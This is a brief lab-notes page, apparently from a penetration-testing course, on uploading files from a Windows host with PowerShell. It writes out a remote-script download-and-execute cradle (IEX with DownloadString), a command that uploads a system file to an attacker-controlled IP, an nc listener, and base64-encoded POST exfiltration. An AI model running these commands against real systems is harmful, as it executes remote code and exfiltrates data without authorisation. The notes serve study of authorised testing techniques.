Flo Aberger | Cyber Notes Structured writeups for labs, CTFs, and security projects.

Upload

PowerShell web Uploads.

Notes and commands for PowerShell web Uploads..

2024-03-27
Tags file-transferwindows-filetransferuploadPowerShell-web-uploads
Back to Pentest Notes Search Notes

PowerShell has no built in upload function.

Install it on kali

  • pip3 install uploadserver

Start the server

  • python3 -m uploadserver

Now we can use a PowerShell script PSUpload.ps1 to perform the file Upload

(accepts 2 Parameter -File (file path) -Uri the server URL

  • PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/PowerShell/PSUpload.ps1')
1

PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

Start NC listener on kali

  • nc -lvnp 8000

base64 encode the file and send it as post request on the PS

  • PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))

  • PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

Write the received base64 string into a new file on kali

  • echo <base64> | base64 -d -w 0 > hosts